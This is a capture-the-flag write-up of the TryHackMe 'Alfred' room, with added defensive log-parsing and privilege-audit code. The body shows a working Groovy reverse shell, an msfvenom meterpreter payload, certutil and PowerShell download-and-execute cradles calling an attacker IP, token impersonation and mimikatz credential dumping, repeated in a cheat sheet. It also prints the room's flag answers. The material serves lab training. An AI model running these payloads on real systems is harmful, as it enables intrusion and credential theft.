Alfred - TryHackMe


Published at: Feb 16, 2024


Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

Metadata


Goal

Learn how to exploit common misconfigurations, mainly with the Nishang tool - and then escalate privileges.

Cheat Sheet

Before we begin, as always there is a generic Cheat Sheet for this room which could be integrated into your own notes. You can find it at the bottom of this write-up. You can also find all of my notes at https://hailstormsec.com/posts/categories/notes.

Tasks

Task 1 - Initial Access

Question(s)

  1. How many ports are open? (TCP only)
  2. What is the username and password for the login panel? (in the format username:password)
  3. What is the user.txt flag?

If you've read my write-ups before you know I like to scan in at least two stages - an initial scan and a narrow scan.

Initial scan:

sudo nmap -p- -v 

Add -Pn if the target is a Windows machine (it usually does not answer ping probes).


Narrow secondary scan:

sudo nmap -v -A -sC --script vuln -p PORTS

The narrow scan found a robots.txt file on port 8080 - but it is useless.

We begin to look at the two web servers on port 80 and 8080.

Port 80:

Landing page on port 80

Not super interesting - maybe the email could be used later...

Port 8080:

Jenkins login page on port 8080

This is however interesting... if we find out the login we will have access to the Jenkins panel!

We can start by googling the default credentials for Jenkins:

Google search for default credentials

From this, a good way to start is by trying 'admin' as the username - however the login panel doesn't seem to respond differently when only the username is correct (assuming admin is the username), so a valid username cannot be confirmed on its own.

In my case I just tried a handful of passwords before finding the right one, admin:admin - however, if you struggle you can default to Hydra or Burp Intruder (or a similar tool).

Landing page once we got access to Jenkins

Now we want to find a way to execute stuff on the server. The logical place to find this is under 'Manage Jenkins', and there we go!

The script console

This is looking really promising! A simple Google search later leads me to this article (https://www.hackingarticles.in/exploiting-jenkins-groovy-script-console-in-multiple-ways/) with a plethora of ways to abuse this functionality. I went for a simple reverse shell to the server:

String host="10.14.46.99";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Script console with payload

To catch the shell in metasploit I used:

msfconsole -qx 'use exploit/multi/handler;set lhost tun0;set lport 4444;run'

Now all you have to do is press run!

Catching the shell!
Our handler to catch the shell
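From the defender's side, the login guessing and script console use above leave a clear trail in the web server or reverse-proxy access log. The following Python is an added example (not from the room or the write-up) that flags requests to the script console endpoints and bursts of failed logins per source; the log lines, IPs and timestamps are constructed, and the /loginError redirect target for a failed Jenkins form login is assumed.

```python
import re
from collections import Counter

# Constructed sample access-log lines (combined log format) for a Jenkins instance
# behind a reverse proxy. IPs, timestamps and sizes are made up for this example.
SAMPLE_LOG = """\
10.9.1.7 - - [16/Feb/2024:10:01:02 +0000] "GET /login HTTP/1.1" 200 3120
10.9.1.7 - - [16/Feb/2024:10:01:09 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0
10.9.1.7 - - [16/Feb/2024:10:01:10 +0000] "GET /loginError HTTP/1.1" 200 2210
10.9.1.7 - - [16/Feb/2024:10:01:15 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0
10.9.1.7 - - [16/Feb/2024:10:01:16 +0000] "GET /loginError HTTP/1.1" 200 2210
10.9.1.7 - - [16/Feb/2024:10:01:20 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0
10.9.1.7 - - [16/Feb/2024:10:01:21 +0000] "GET /loginError HTTP/1.1" 200 2210
10.9.1.7 - - [16/Feb/2024:10:01:30 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0
10.9.1.7 - - [16/Feb/2024:10:01:31 +0000] "GET / HTTP/1.1" 200 15020
10.9.1.7 - - [16/Feb/2024:10:02:40 +0000] "GET /manage HTTP/1.1" 200 9800
10.9.1.7 - - [16/Feb/2024:10:03:00 +0000] "GET /script HTTP/1.1" 200 4410
10.9.1.7 - - [16/Feb/2024:10:03:05 +0000] "POST /script HTTP/1.1" 200 4410
10.9.1.7 - - [16/Feb/2024:10:03:07 +0000] "POST /scriptText HTTP/1.1" 200 45
10.9.1.20 - - [16/Feb/2024:10:05:00 +0000] "GET /job/build/lastBuild/console HTTP/1.1" 200 8000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def analyse_access_log(log_text, failed_login_threshold=3):
    """Return script console requests and sources with many failed logins.

    /script is the web console page (POST executes Groovy), /scriptText is the
    plain-text endpoint used by tooling; agent consoles live under /computer/<name>/script,
    so the match is on the path suffix. A failed form login is assumed to redirect
    to /loginError, so its count per source approximates failed attempts."""
    console_hits = []
    failed_logins = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        path = m["path"].split("?", 1)[0].rstrip("/") or "/"
        if path.endswith(("/script", "/scriptText")):
            console_hits.append((m["ip"], m["ts"], m["method"], path))
        if path == "/loginError":
            failed_logins[m["ip"]] += 1
    bursts = {ip: n for ip, n in failed_logins.items() if n >= failed_login_threshold}
    return {"script_console_requests": console_hits, "login_failure_bursts": bursts}
```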

Unfortunately we cannot instantly upgrade this shell to a meterpreter session, so we have to do it the manual way: generate a payload and upload it to the server.

Generate payload:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.14.46.99 LPORT=4443 -f exe -o meterpreter.exe

Download the payload (certutil is installed by default):

certutil -URLcache -split -f http://10.14.46.99:8000/meterpreter.exe meterpreter.exe

Start a handler:

msfconsole -qx 'use exploit/multi/handler;set lhost tun0;set lport 4443;set payload windows/x64/meterpreter/reverse_tcp;run'

And execute the payload: .\meterpreter.exe

Bonus ways of getting access

In the process of finding the way that I did, I also found a metasploit module and a way to instantly get a meterpreter shell. There is also what I assume is the intended way to do it.

  • Metasploit: use exploit/multi/http/jenkins_script_console
  • Then I found this article which I kept building upon. It uses a PowerSploit module to send back a payload. See the script below. Note: I never managed to receive the shell back due to the server timing out. I suspect the issue is the server resources since it successfully downloaded the payload.
#!/bin/bash
# meterpreter ip & port
lhost=10.14.46.99
lport=4444
echo " * Writing Payload"
cat /usr/share/windows-resources/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload
echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload
echo " * Prepping Command"
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://$lhost:8000/payload')"
echo $scriptblock
echo
echo " * Encoding command"
encode="`echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0`"
echo $encode
command="cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc $encode"
echo
echo " * Final command"
echo $command
echo 
echo " * Groovy command "
echo " def process=\"$command\".execute();"
echo " println(\"\${process.text}\"); "
echo
echo " * Starting HTTP Server to serve payload"
python3 -m http.server
  • The proper way to do it - there is another way to communicate with the server on the Jenkins web application (the original shows screenshots of the project, configure, apply and build steps):
    Now you just have to host the powershell payload provided (python3 -m http.server) and a handler to catch the shell (either via metasploit use exploit/multi/handler or netcat).

Now with a meterpreter shell, we can just read the user flag:

User flag!
Wooo! We got the first flag!

Answer(s)

  1. 3
  2. admin:admin
  3. 79007a09481963edf2e1321abd9ae2a0

Task 2 - Switching Shells

Question(s)

What is the final size of the exe payload that you generated?

I accidentally did this in the last task with the same payload - so I just entered the final size and jumped to the next task.

Answer(s)

73802

Task 3 - Privilege Escalation

Windows uses token-based permissions, assigned (usually by lsass.exe) when users log in/authenticate.

This access token consists of:

  • User SID (security identifier)
  • Group SIDs
  • Privileges
  • And more...

Two types of access tokens:

  • Primary access tokens: those associated with a user account that are generated on log on
  • Impersonation tokens: these allow a particular process (or thread in a process) to gain access to resources using the token of another (user/client) process. Think similar to how SUID-bits work in Linux. Levels of impersonation token:
    • SecurityAnonymous: current user/client cannot impersonate another user/client
    • SecurityIdentification: current user/client can get the identity and privileges of a client but cannot impersonate the client
    • SecurityImpersonation: current user/client can impersonate the client's security context on the local system
    • SecurityDelegation: current user/client can impersonate the client's security context on a remote system

Distinguishing an impersonation token from a primary token

Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).

Here are the most commonly abused privileges:

  • SeImpersonatePrivilege
  • SeAssignPrimaryTokenPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege

There's more reading here. To list privileges: whoami /priv

Question(s)

  1. Use the impersonate_token "BUILTIN\Administrators" command to impersonate the Administrators' token. What is the output when you run the getuid command?
  2. Read the root.txt file located at C:\Windows\System32\config

We begin listing our privileges:

Our privileges with whoami /priv

Comparing this to what we have just learned, two commonly exploited privileges are:

  • SeImpersonatePrivilege
  • SeDebugPrivilege

Both of these are enabled for our user.
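As an added check (not part of the room or the write-up), the following Python parses whoami /priv output like the one above and reports which of the commonly abused privileges from the list earlier the token holds, split by state. This is a quick way to audit the account a service such as Jenkins runs under; the sample output is constructed.

```python
import re

# The privileges the write-up lists as most commonly abused. A service account
# should not normally hold these at all; SeImpersonatePrivilege in particular is
# what makes a token-impersonation escalation possible from a service context.
ABUSED_PRIVILEGES = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeTcbPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeCreateTokenPrivilege",
    "SeLoadDriverPrivilege", "SeTakeOwnershipPrivilege", "SeDebugPrivilege",
}

# Constructed sample of `whoami /priv` output (format only; not captured from the lab box).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeBackupPrivilege             Back up files and directories             Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeDebugPrivilege              Debug programs                            Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# One table row: name, free-text description, then the state column.
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")

def parse_privileges(text):
    """Map privilege name -> 'Enabled' / 'Disabled' from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs

def audit_privileges(text):
    """Return the commonly abused privileges present in this token, split by state.
    A privilege that is only Disabled is still held: its owner can switch it on
    with AdjustTokenPrivileges, so both lists are findings."""
    held = {n: s for n, s in parse_privileges(text).items() if n in ABUSED_PRIVILEGES}
    return {
        "enabled": sorted(n for n, s in held.items() if s == "Enabled"),
        "disabled": sorted(n for n, s in held.items() if s == "Disabled"),
    }
```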

If both of these are enabled we can [load/use] incognito in meterpreter and impersonate any available token:

And we are system!

Meterpreter modules

To list all modules you can load, simply type load and then press tab twice. After you've loaded a module, you will find its commands at the bottom of the help output.


Even though we are impersonating `NT AUTHORITY\SYSTEM` we may still not have elevated privileges, because Windows uses the process's primary access token to decide what it can do. To make sure we have the correct privileges we can migrate to a process that runs as SYSTEM: `migrate -N services.exe`. Now, if successful, we can access the root folder and read the final flag:

Admin flag!

BONUS:

To get all the credentials on the system, we can load the kiwi (mimikatz) module:

Getting the credentials

Now we can compare the hashdump (no module required) vs the mimikatz outputs:


Answer(s)

  1. NT AUTHORITY\SYSTEM
  2. dff0f748678f280250f25a45b8046b4a

Cheat Sheet

Nmap

Initial port scan:

sudo nmap -p- -v 

Add -Pn if the target is a Windows machine.

Narrow secondary scan:

sudo nmap -v -A -sC --script vuln -p PORTS

Payloads

Msfvenom: Reverse meterpreter shell:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.14.46.99 LPORT=4443 -f exe -o meterpreter.exe

Groovy:

String host="10.14.46.99";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

https://www.hackingarticles.in/exploiting-jenkins-groovy-script-console-in-multiple-ways/

#!/bin/bash

# meterpreter ip & port
lhost=10.14.46.99
lport=4444

echo " * Writing Payload"
cat /usr/share/windows-resources/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload
echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload

echo " * Prepping Command"
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://$lhost:8000/payload')"
echo $scriptblock

echo
echo " * Encoding command"
encode="`echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0`"
echo $encode

command="cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc $encode"
echo
echo " * Final command"
echo $command

echo
echo " * Groovy command "
echo " def process=\"$command\".execute();"
echo " println(\"\${process.text}\"); "

echo
echo " * Starting HTTP Server to serve payload"
python3 -m http.server

Living off the Land (LOL/LotL)

What is LOL?

Living off the Land, or LOL/LotL, is when, instead of uploading your own tools to the target machine, you use what is already there by default to accomplish the same goals. This greatly reduces the odds of you setting off alarm bells in the EDR system.

Download file:

certutil -URLcache -split -f http://10.14.46.99:8000/meterpreter.exe meterpreter.exe

Host webserver

python -m http.server [--bind 0.0.0.0 <port>]

Privileges in Windows

Windows uses token-based permissions, assigned (usually by lsass.exe) when users log in/authenticate.

This access token consists of:

  • User SID (security identifier)
  • Group SIDs
  • Privileges
  • And more...

Two types of access tokens:

  • Primary access tokens: those associated with a user account that are generated on log on
  • Impersonation tokens: these allow a particular process (or thread in a process) to gain access to resources using the token of another (user/client) process. Think similar to how SUID-bits work in Linux. Levels of impersonation token:
    • SecurityAnonymous: current user/client cannot impersonate another user/client
    • SecurityIdentification: current user/client can get the identity and privileges of a client but cannot impersonate the client
    • SecurityImpersonation: current user/client can impersonate the client's security context on the local system
    • SecurityDelegation: current user/client can impersonate the client's security context on a remote system

Distinguishing an impersonation token from a primary token

Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).

Here are the most commonly abused privileges:

  • SeImpersonatePrivilege
  • SeAssignPrimaryTokenPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege

There's more reading here. To list privileges: whoami /priv

Meterpreter

Modules:

[load/use] <module-name>

Meterpreter modules

To list all modules you can load, simply type load and then press tab twice. After you've loaded a module, you will find its commands at the bottom of the help output.


Migrate to another process:

migrate <PID>
migrate -N <process-name>
